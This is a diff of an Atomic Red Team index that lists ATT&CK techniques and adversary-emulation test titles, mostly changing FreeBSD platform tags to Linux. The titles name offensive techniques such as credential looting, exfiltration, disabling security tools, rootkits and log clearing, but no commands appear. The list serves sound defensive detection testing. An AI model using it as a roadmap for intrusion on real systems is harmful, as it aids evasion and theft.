||||
- Atomic Test #5: System Time with Windows time Command [windows]
|
||||
|
||||
@@ -2699,10 +2699,10 @@
|
||||
- Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell [azure-ad]
|
||||
- Atomic Test #8: Azure AD - Delete user via Azure CLI [azure-ad]
|
||||
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
|
||||
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux]
|
||||
- Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux]
|
||||
- Atomic Test #5: PureLocker Ransom Note [windows]
|
||||
- Atomic Test #6: Encrypt files using 7z utility - macOS [macos]
|
||||
- Atomic Test #7: Encrypt files using openssl utility - macOS [macos]
|
||||
@@ -2712,11 +2712,11 @@
|
||||
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1496 Resource Hijacking](../../T1496/T1496.md)
|
||||
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux]
|
||||
- Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
|
||||
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1485 Data Destruction](../../T1485/T1485.md)
|
||||
- Atomic Test #1: Windows - Overwrite file with SysInternals SDelete [windows]
|
||||
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos]
|
||||
- Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
|
||||
- Atomic Test #3: Overwrite deleted data on C drive [windows]
|
||||
- Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
|
||||
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -2736,14 +2736,14 @@
|
||||
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
|
||||
- Atomic Test #1: Shutdown System - Windows [windows]
|
||||
- Atomic Test #2: Restart System - Windows [windows]
|
||||
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux]
|
||||
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #7: Reboot System via `halt` - FreeBSD [freebsd]
|
||||
- Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos]
|
||||
- Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux]
|
||||
- Atomic Test #7: Reboot System via `halt` - FreeBSD [linux]
|
||||
- Atomic Test #8: Reboot System via `halt` - Linux [linux]
|
||||
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux]
|
||||
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [freebsd]
|
||||
- Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux]
|
||||
- Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux]
|
||||
- Atomic Test #11: Reboot System via `poweroff` - Linux [linux]
|
||||
- Atomic Test #12: Logoff System - Windows [windows]
|
||||
|
||||
@@ -2789,11 +2789,11 @@
|
||||
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
|
||||
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [freebsd]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [freebsd]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [freebsd]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
|
||||
# exfiltration
|
||||
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -2807,12 +2807,12 @@
|
||||
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
|
||||
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
|
||||
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd]
|
||||
- Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux]
|
||||
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
|
||||
- Atomic Test #1: C2 Data Exfiltration [windows]
|
||||
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd]
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
|
||||
- Atomic Test #3: DNSExfiltration (doh) [windows]
|
||||
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -2821,18 +2821,18 @@
|
||||
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
|
||||
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
|
||||
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
|
||||
- Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd]
|
||||
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
|
||||
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd]
|
||||
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
|
||||
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
|
||||
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux]
|
||||
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
|
||||
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
|
||||
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
|
||||
- Atomic Test #6: MAZE FTP Upload [windows]
|
||||
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
|
||||
- Atomic Test #8: Python3 http.server [linux]
|
||||
- Atomic Test #9: Python3 http.server (freebsd) [freebsd]
|
||||
- Atomic Test #9: Python3 http.server (freebsd) [linux]
|
||||
|
||||
|
||||
@@ -5,20 +5,24 @@
|
||||
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
|
||||
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
|
||||
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
|
||||
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
|
||||
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
|
||||
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
|
||||
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
|
||||
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
|
||||
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
|
||||
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
|
||||
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
|
||||
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
|
||||
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
|
||||
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
|
||||
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
|
||||
- Atomic Test #10: chflags - Remove immutable file attribute [linux]
|
||||
- Atomic Test #11: Chmod through c script [macos, linux]
|
||||
- Atomic Test #12: Chmod through c script (freebsd) [linux]
|
||||
- Atomic Test #13: Chown through c script [macos, linux]
|
||||
- Atomic Test #14: Chown through c script (freebsd) [linux]
|
||||
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1014 Rootkit](../../T1014/T1014.md)
|
||||
- Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
|
||||
@@ -28,17 +32,26 @@
|
||||
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
|
||||
- Atomic Test #1: Sudo usage [macos, linux]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [linux]
|
||||
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
|
||||
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
|
||||
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
|
||||
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
|
||||
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
|
||||
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
|
||||
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
|
||||
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
|
||||
- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
|
||||
- Atomic Test #1: rm -rf [macos, linux]
|
||||
- Atomic Test #2: rm -rf [linux]
|
||||
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
|
||||
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
|
||||
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
|
||||
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
|
||||
- Atomic Test #18: Delete system journal logs via rm and journalctl utilities [linux]
|
||||
- Atomic Test #19: Overwrite Linux Mail Spool [linux]
|
||||
- Atomic Test #20: Overwrite Linux Log [linux]
|
||||
@@ -47,19 +60,28 @@
|
||||
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
|
||||
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
|
||||
- Atomic Test #2: Clear sh history (rm) [linux]
|
||||
- Atomic Test #3: Clear Bash history (echo) [linux]
|
||||
- Atomic Test #4: Clear sh history (echo) [linux]
|
||||
- Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
|
||||
- Atomic Test #6: Clear sh history (cat dev/null) [linux]
|
||||
- Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
|
||||
- Atomic Test #8: Clear sh history (ln dev/null) [linux]
|
||||
- Atomic Test #9: Clear Bash history (truncate) [linux]
|
||||
- Atomic Test #10: Clear sh history (truncate) [linux]
|
||||
- Atomic Test #11: Clear history of a bunch of shells [linux, macos]
|
||||
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
|
||||
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
|
||||
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
|
||||
- Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
|
||||
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
|
||||
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
|
||||
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
|
||||
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
|
||||
- Atomic Test #3: Base64 decoding with Python [linux, macos]
|
||||
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
|
||||
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
|
||||
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux]
|
||||
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux]
|
||||
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
|
||||
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
|
||||
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
|
||||
- [T1562 Impair Defenses](../../T1562/T1562.md)
|
||||
@@ -73,18 +95,20 @@
|
||||
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
|
||||
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
|
||||
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
|
||||
- Atomic Test #1: Set a file's access timestamp [linux, macos]
|
||||
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
|
||||
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
|
||||
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
|
||||
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
|
||||
- Atomic Test #7: Stop/Start UFW firewall [linux]
|
||||
- Atomic Test #8: Stop/Start Packet Filter [linux]
|
||||
- Atomic Test #9: Stop/Start UFW firewall systemctl [linux]
|
||||
- Atomic Test #10: Turn off UFW logging [linux]
|
||||
- Atomic Test #11: Add and delete UFW firewall rules [linux]
|
||||
- Atomic Test #12: Add and delete Packet Filter rules [linux]
|
||||
- Atomic Test #13: Edit UFW firewall user.rules file [linux]
|
||||
- Atomic Test #14: Edit UFW firewall ufw.conf file [linux]
|
||||
- Atomic Test #15: Edit UFW firewall sysctl.conf file [linux]
|
||||
@@ -94,8 +118,8 @@
|
||||
- Atomic Test #19: Modify/delete iptables firewall rules [linux]
|
||||
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
|
||||
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
|
||||
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
|
||||
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
|
||||
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
|
||||
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
|
||||
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
|
||||
@@ -104,16 +128,21 @@
|
||||
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
|
||||
- Atomic Test #1: Make and modify binary from C source [macos, linux]
|
||||
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
|
||||
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
|
||||
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
|
||||
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
|
||||
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
|
||||
- Atomic Test #7: Make and modify capabilities of a binary [linux]
|
||||
- Atomic Test #8: Provide the SetUID capability to a file [linux]
|
||||
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
|
||||
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
|
||||
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
|
||||
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
|
||||
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
|
||||
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
|
||||
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
|
||||
- Atomic Test #3: Logging Configuration Changes on Linux Host [linux]
|
||||
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux]
|
||||
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -128,16 +157,20 @@
|
||||
- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
|
||||
- Atomic Test #1: Disable history collection [linux, macos]
|
||||
- Atomic Test #2: Disable history collection (freebsd) [linux]
|
||||
- Atomic Test #3: Mac HISTCONTROL [macos, linux]
|
||||
- Atomic Test #4: Clear bash history [linux]
|
||||
- Atomic Test #5: Setting the HISTCONTROL environment variable [linux]
|
||||
- Atomic Test #6: Setting the HISTFILESIZE environment variable [linux]
|
||||
- Atomic Test #7: Setting the HISTSIZE environment variable [linux]
|
||||
- Atomic Test #8: Setting the HISTFILE environment variable [linux]
|
||||
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
|
||||
- Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
|
||||
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
|
||||
- Atomic Test #1: Disable syslog [linux]
|
||||
- Atomic Test #2: Disable syslog (freebsd) [linux]
|
||||
- Atomic Test #3: Disable Cb Response [linux]
|
||||
- Atomic Test #4: Disable SELinux [linux]
|
||||
- Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
|
||||
@@ -145,28 +178,30 @@
|
||||
- Atomic Test #40: Suspend History [linux]
|
||||
- Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
|
||||
- Atomic Test #42: Clear Pagging Cache [linux]
|
||||
- Atomic Test #43: Disable Memory Swap [freebsd, linux]
|
||||
- Atomic Test #43: Disable Memory Swap [linux]
|
||||
- Atomic Test #47: Tamper with Defender ATP on Linux/MacOS [linux, macos]
|
||||
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
|
||||
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
|
||||
- Atomic Test #2: Decode base64 Data into Script [linux]
|
||||
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
|
||||
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux]
|
||||
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
|
||||
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
|
||||
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
|
||||
- Atomic Test #2: Install root CA on FreeBSD [linux]
|
||||
- Atomic Test #3: Install root CA on Debian/Ubuntu [linux]
|
||||
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
|
||||
- Atomic Test #3: C compile [freebsd, linux, macos]
|
||||
- Atomic Test #4: CC compile [freebsd, linux, macos]
|
||||
- Atomic Test #5: Go compile [freebsd, linux, macos]
|
||||
- Atomic Test #3: C compile [linux, macos]
|
||||
- Atomic Test #4: CC compile [linux, macos]
|
||||
- Atomic Test #5: Go compile [linux, macos]
|
||||
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
@@ -177,10 +212,11 @@
|
||||
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
|
||||
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
|
||||
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
|
||||
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
|
||||
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
|
||||
- Atomic Test #3: Overwrite and delete a file with shred [linux]
|
||||
- Atomic Test #8: Delete Filesystem - Linux [linux]
|
||||
- Atomic Test #9: Delete Filesystem - FreeBSD [linux]
|
||||
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
|
||||
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
|
||||
@@ -190,15 +226,19 @@
|
||||
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
|
||||
- Atomic Test #2: Space After Filename [macos, linux]
|
||||
- Atomic Test #3: Space After Filename (FreeBSD) [linux]
|
||||
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
|
||||
- Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
|
||||
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
|
||||
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
|
||||
- Atomic Test #8: Create local account (Linux) [linux]
|
||||
- Atomic Test #9: Create local account (FreeBSD) [linux]
|
||||
- Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
|
||||
- Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
|
||||
- Atomic Test #12: Login as nobody (Linux) [linux]
|
||||
- Atomic Test #13: Login as nobody (freebsd) [linux]
|
||||
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
|
||||
# persistence
|
||||
@@ -208,6 +248,7 @@
|
||||
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
|
||||
- Atomic Test #1: Malicious PAM rule [linux]
|
||||
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
|
||||
- Atomic Test #3: Malicious PAM module [linux]
|
||||
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
